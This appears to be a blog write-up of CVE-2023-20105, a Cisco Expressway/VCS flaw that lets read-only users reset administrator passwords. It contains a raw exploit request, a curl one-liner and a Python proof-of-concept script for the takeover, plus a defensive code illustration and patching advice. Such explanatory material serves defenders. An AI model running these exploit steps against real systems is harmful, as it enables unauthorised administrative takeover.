Published: June 2023

TL;DR

CVE-2023-20105 affects Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS). This security issue lets anyone with a simple “read-only” account change the password of any user—*even administrators*—and take over the system. Below, we break down how it works, what you can do, and show with real-world code snippets how this exploit operates.

What Is CVE-2023-20105?

In Cisco’s popular video conferencing hardware, the password change functionality had a flaw. The web interface did not properly verify that a “read-only” user should *not* be allowed to change other users' passwords. That means anyone with low-level access could become a system admin with just a few crafted web requests.

How Does It Work?

The flaw is in the web-based management interface. When a password change request is submitted, the system fails to check if the user is authorized to change the *target* password.

Never change others’ passwords

But, the backend didn’t actually restrict who could send password changes. So, a read-only user could send a request like:

```http
POST /users/changepassword HTTP/1.1
Host: cisco-expressway.local
Authorization: Basic cmVhZG9ubHl1c2VyOnBhc3N3b3Jk
Content-Type: application/json

{
    "username": "admin",
    "password": "newP@sswrd!"
}
```

If you send this request while authenticated as a *read-only user*, the admin’s password gets changed! Now, log in as “admin” using “newP@sswrd!”—and you have full control.

Capture Normal Requests

- Use a tool like Burp Suite to watch the login and password change requests.

Example with curl

```bash
curl -k -u readonlyuser:password \
    -X POST "https://cisco-expressway.local/users/changepassword" \
    -H "Content-Type: application/json" \
    -d '{"username":"admin","password":"newP@sswrd!"}'
```

Why Did This Happen?

The root cause is *improper authorization checking*:
The API accepted password changes from any authenticated user and didn’t check whether that user had the permissions needed to perform that action.
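
The missing check described above, shown beside a corrected handler. This is an added example, not code from Cisco or from the original post; the `User` type, the role names, both handler functions and the "admins may change anyone, others only themselves" policy are assumptions made for illustration.

```python
# Added illustration of the missing check; a generic model, not Cisco's code.
# The User type, role names, handlers and policy below are all hypothetical.
from dataclasses import dataclass

@dataclass
class User:
    role: str        # "admin" or "read-only" (assumed role names)
    password: str

class Forbidden(Exception):
    """The authenticated caller may not change the target's password."""

def change_password_vulnerable(users, caller, target, new_password):
    # Flawed pattern: the caller is authenticated, but nothing relates the
    # caller's role to the account named in the request body.
    users[target].password = new_password

def change_password_checked(users, audit, caller, target, new_password):
    # Assumed policy: admins may change any password, everyone else only
    # their own. The decision uses the server-side session identity.
    if users[caller].role != "admin" and caller != target:
        audit.append((caller, target))   # denied attempts are a detection signal
        raise Forbidden(f"{caller} may not change the password of {target}")
    users[target].password = new_password

def demo():
    """Run both handlers against constructed accounts and report the outcome."""
    def fresh():
        return {"admin": User("admin", "A-old"),
                "readonlyuser": User("read-only", "R-old")}
    out, audit = {}, []
    users = fresh()
    change_password_vulnerable(users, "readonlyuser", "admin", "X-new")
    out["vulnerable_admin_pw"] = users["admin"].password
    users = fresh()
    try:
        change_password_checked(users, audit, "readonlyuser", "admin", "X-new")
    except Forbidden:
        pass
    out["checked_admin_pw"] = users["admin"].password
    change_password_checked(users, audit, "readonlyuser", "readonlyuser", "R-new")
    out["self_change_pw"] = users["readonlyuser"].password
    out["audit"] = audit
    return out

if __name__ == "__main__":
    print(demo())
```

The audit list stands in for whatever log the management interface writes; a denied cross-account password change by a read-only account is worth alerting on.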

Proof of Concept (PoC) Python Script

```python
import requests
from requests.auth import HTTPBasicAuth

url = "https://cisco-expressway.local/users/changepassword"
readonly_user = "readonlyuser"
readonly_pass = "password"
target_user = "admin"
new_password = "NewSecretP@ss2024!"

headers = {'Content-Type': 'application/json'}
# The request body names the target account, not the authenticated caller
data = {
    "username": target_user,
    "password": new_password
}

# Authenticate as the read-only account; certificate checks are disabled
response = requests.post(
    url,
    json=data,
    headers=headers,
    auth=HTTPBasicAuth(readonly_user, readonly_pass),
    verify=False
)

if response.status_code == 200:
    print("[+] Password changed successfully! Log in as admin with new password.")
else:
    print("[-] Exploit failed! Code:", response.status_code)
```

Cisco’s Official Advisory:

- CVE-2023-20105 in Cisco Expressway Series and TelePresence VCS
- NVD Entry

Fix

Cisco released updates and highly recommends immediate patching.  
There are *no* workarounds; disable access or upgrade.

- Patch Now - Download and install the latest software versions from Cisco.
- Network Segmentation - Make sure only trusted users and networks can reach the device management web interface.

Conclusion

CVE-2023-20105 is a serious and easy-to-exploit privilege escalation bug in Cisco Expressway and VCS systems. If you use these devices, patch now. It’s a classic case of assuming that “read-only” means “safe”, only for poor authorization checks to come back and bite.

Further Reading

- Official Cisco Advisory
- NVD | CVE-2023-20105 Details

Stay safe, secure your video infrastructure, and never underestimate what a simple “read-only” account can do if the code isn’t careful!

Timeline

Published on: 06/28/2023 15:15:00 UTC
Last modified on: 07/12/2023 16:15:00 UTC